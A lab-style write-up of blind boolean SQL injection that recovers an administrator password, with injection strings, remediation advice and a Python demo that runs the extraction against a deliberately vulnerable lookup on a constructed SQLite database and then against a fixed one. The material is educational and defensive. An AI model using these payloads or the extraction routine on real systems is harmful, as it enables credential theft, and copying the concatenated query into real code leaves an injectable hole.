target:
Tools Used:
Browser
Burp Suite
Vulnerability Summary:
Type: SQL Injection
Description:
The database contains a separate table called users, with columns called username and password. The injection is blind: the query results are never returned in the response, so the only signal available is whether the page behaves differently for a true condition versus a false one. That difference is used as a boolean oracle to find out the password of the administrator user.
Steps to Exploit:
1. Confirm that the server is interpreting the injected value as part of a SQL query: append a condition that is always true (for example `' AND '1'='1`) and check that the normal response is preserved.
2. Submit a query that is syntactically valid but evaluates to false (for example `' AND '1'='2`) and confirm that the response differs. The difference between these two responses is the boolean oracle used in every later step.
3. Verify that the users table exists by injecting a subquery that selects from it (for example `' AND (SELECT 'a' FROM users LIMIT 1)='a`); a true response means the table exists, a false one means the query failed or returned nothing.
4. Test whether specific entries exist in the table, for example a row where username is administrator, by adding that condition to the subquery.
5. Determine how many characters are in the password of the administrator user by testing `LENGTH(password) > n` for increasing n until the condition turns false.
6. Determine the password one character at a time by testing `SUBSTRING(password, i, 1) = 'c'` for each position i and each candidate character c; the position is solved when the oracle returns true. Automate this with Burp Intruder or a small script, since it takes one request per candidate character per position.
Remediation:
Use parameterized queries / prepared statements so that user-controlled values (including cookies and headers, not only form fields) are passed as bound parameters and never concatenated into SQL text. This is the actual fix; the items below are defence in depth.
Use server-side input validation with an allow-list for the expected format (for example, a tracking id should only ever match a fixed alphanumeric pattern).
Escaping and sanitizing user input is a fallback only and is dialect-specific and easy to get wrong; do not rely on it instead of parameterization.
Run the application's database account with least privilege so that a successful injection in one feature cannot read tables, such as users, that the feature has no need to touch.
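The six steps above and the remediation, as one added worked example that is not part of the original write-up. It assumes a hypothetical tracking-id lookup against an in-memory SQLite database with a constructed users table and a constructed administrator password; the real target's cookie name, response marker and DBMS dialect are not in this write-up, so they are placeholders here (LENGTH and SUBSTR are the SQLite spellings; PostgreSQL would use SUBSTRING). The same extraction routine is run against the vulnerable lookup and the parameterized one to show that the oracle disappears once the value is bound instead of concatenated.

```python
import sqlite3
import string

# Constructed secret for the demo; the real lab value is not known to this write-up.
SECRET_PASSWORD = "s3cr3tP@ss"
KNOWN_TRACKING_ID = "abc123"  # hypothetical valid cookie value


def make_db():
    """Build a constructed in-memory backend: a tracking table and the users table from the write-up."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tracking (id TEXT)")
    conn.execute("INSERT INTO tracking VALUES (?)", (KNOWN_TRACKING_ID,))
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('administrator', ?)", (SECRET_PASSWORD,))
    conn.execute("INSERT INTO users VALUES ('wiener', 'peter')")
    conn.commit()
    return conn


def vulnerable_lookup(conn, tracking_id):
    """Vulnerable: the cookie is concatenated into the query.
    Returns True when the app would show its 'welcome back' marker (query returned a row),
    False when it returned nothing or the SQL was invalid. That True/False is the oracle."""
    sql = f"SELECT id FROM tracking WHERE id = '{tracking_id}'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def safe_lookup(conn, tracking_id):
    """Fixed: the cookie is a bound parameter, so quotes and keywords in it are just data."""
    row = conn.execute("SELECT id FROM tracking WHERE id = ?", (tracking_id,)).fetchone()
    return row is not None


def extract_password(oracle, username="administrator",
                     charset=string.ascii_letters + string.digits + "@#$%^&*!"):
    """Steps 1-6 of the write-up against oracle(tracking_id) -> bool."""
    base = KNOWN_TRACKING_ID
    # Steps 1 and 2: a true condition keeps the normal response, a false one changes it.
    if not (oracle(base + "' AND '1'='1") and not oracle(base + "' AND '1'='2")):
        raise RuntimeError("no boolean oracle: injection not interpreted as SQL")
    # Step 3: the subquery only succeeds if the users table exists.
    if not oracle(base + "' AND (SELECT 'a' FROM users LIMIT 1)='a"):
        raise RuntimeError("users table not found")
    # Step 4: does a row for the target user exist?
    if not oracle(base + f"' AND (SELECT 'a' FROM users WHERE username='{username}')='a"):
        raise RuntimeError(f"no row for {username}")
    # Step 5: grow n until LENGTH(password) > n stops being true.
    length = 0
    while oracle(base + f"' AND (SELECT 'a' FROM users WHERE username='{username}' "
                        f"AND LENGTH(password)>{length})='a"):
        length += 1
    # Step 6: one request per candidate character per position.
    password = ""
    for i in range(1, length + 1):
        for ch in charset:
            if oracle(base + f"' AND (SELECT SUBSTR(password,{i},1) FROM users "
                             f"WHERE username='{username}')='{ch}"):
                password += ch
                break
        else:
            raise RuntimeError(f"character {i} is outside the candidate charset")
    return password


def run_demo():
    """Vulnerable lookup leaks the password; the parameterized one gives no oracle at all."""
    conn = make_db()
    recovered = extract_password(lambda tid: vulnerable_lookup(conn, tid))
    try:
        extract_password(lambda tid: safe_lookup(conn, tid))
        fixed = False
    except RuntimeError:
        fixed = True
    return recovered, fixed


if __name__ == "__main__":
    pw, fixed = run_demo()
    print(f"recovered via vulnerable lookup: {pw}; parameterized lookup blocks the oracle: {fixed}")
```

The linear length probe in step 5 is the write-up's approach; a binary search over `LENGTH(password) > n` and over character ranges (`SUBSTR(...) > 'm'`) cuts the request count substantially on a real target, at the cost of needing a collation-aware ordering. Note also that the parameterized version still returns True for the real tracking id, so the fix changes nothing for legitimate users.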